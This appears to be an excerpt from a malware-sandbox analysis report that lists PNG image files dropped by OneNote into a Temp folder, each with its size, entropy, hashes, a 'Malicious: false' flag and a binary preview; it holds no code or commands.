SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Temp\{14DB26A0-D5FB-4C03-A0E4-1BB045968C25}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Temp\{170A7946-740C-4DFA-A1D2-B12B79D4E219}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Temp\{19E1DC2F-8081-42B3-A29C-507AD2871824}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Temp\{1AC84258-A8F0-4C1A-9A9C-14967BF4EFEC}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Temp\{1C496C8C-4854-45C3-B170-25555EB0BED1}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Temp\{1C829327-87DF-484A-9B85-CD6B5B7ACDE1}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Temp\{1D316F00-2F42-47B2-BF10-E69ECF7E7790}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Temp\{1D4314AF-6FAE-420C-A535-194C2B0D8B32}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{1D51B1B8-FD23-4A28-AD57-45D91B56B853}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Temp\{207D1AB5-BC93-46C0-A9FC-2B01A0158771}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Temp\{218F2275-2ED5-4700-ACCF-73A2D68D3AF9}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Temp\{2226A948-609C-4E5C-852B-762D6F4CD36E}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Temp\{24CD4F0C-4B32-4740-8CA6-2FAA5994DAE8}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Temp\{2775E8BC-F005-4111-A856-9CC23A72DEE9}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
